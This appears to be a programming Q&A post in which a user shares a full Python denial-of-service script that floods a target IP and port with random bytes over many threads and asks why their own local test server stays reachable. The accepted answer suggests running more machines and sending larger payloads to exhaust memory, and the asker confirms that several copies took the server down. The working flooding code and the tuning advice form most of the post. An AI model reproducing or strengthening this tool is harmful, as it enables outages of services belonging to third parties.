# Why My Server Is Still Accessible after a DoS Attack in Python?

Tags: python, security

I started a Python Server using **`python -m http.server 80`**, and when I tried to attack my own Server with DoS Attack, the Server could still be accessed by my PC which is on the same wi-fi network as my computer.

Here Is The DoS Code:

```
import socket

import sys

import threading

import time

import random

try:
    WEB = str(sys.argv[1])
    PORT = int(sys.argv[2])
    THREAD = int(sys.argv[3])
    TIMER = float(sys.argv[4])
except:
    print("You Haven't Declare The Arguments!")
    WEB = str(input("Enter The IP To Attack: "))
    PORT = int(input("Enter The Port: "))
    THREAD = int(input("Enter Threads: "))
    TIMER = int(input("Enter Timer: "))

timeout = time.time() + 1 * TIMER
def main(WEB, PORT):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    s.connect((WEB, PORT))

    byte = random._urandom(1024)
    try:
        while True:
            s.send(byte*random.randint(5, 15))
    except:
        PORT += 1

def handle_threading():
    global WEB
    global PORT
    global THREAD
    for i in range(0, THREAD):
        thread = threading.Thread(target=main, args=(WEB, PORT))

        thread.start()

if __name__ == "__main__":
    i = 0
    if TIMER == 0:
        while True:
            try:
                
                handle = threading.Thread(target=handle_threading)
                
                handle.start()
                
                handle.join()

                i += 1
            except:
                pass
    else:
        while i <= TIMER-1:
            try:
                handle = threading.Thread(target=handle_threading)
            
                handle.start()
            
                handle.join()
    
                i += 1
            except:
                pass

    print("\nAttack Done!\nCount: %s" %(i))
    sys.exit()
```

Is it possible because the server is running and opened locally?

Can someone tell me why the Server is still working after a DoS Attack?

Comment: *After* the attack the server can just run normally. Have you tested if the server is working properly *during* the attack?

Comment: During the attack i have tried to access it and it still can be access with my phone and PC

Answer (score 1, accepted):

You need more that one computer to perform the DoS.

There's no description about your lab environment, is it possible that your server has more resources (cpu speed, ram capacity, ssd hard drives,..) that your PC?

You could try to increase the number of bytes that you're sending in each connection. Send a video file to your server just for trying to run out the memory of the server. It just a test because it depends on the service that is listening on the server side and how good is able to manage the available memory.

Comment: Thank you very much for the advice, I have tried running the script on 2+ terminals and the server cannot be accessed by my computer and cellphone. Thank you very much!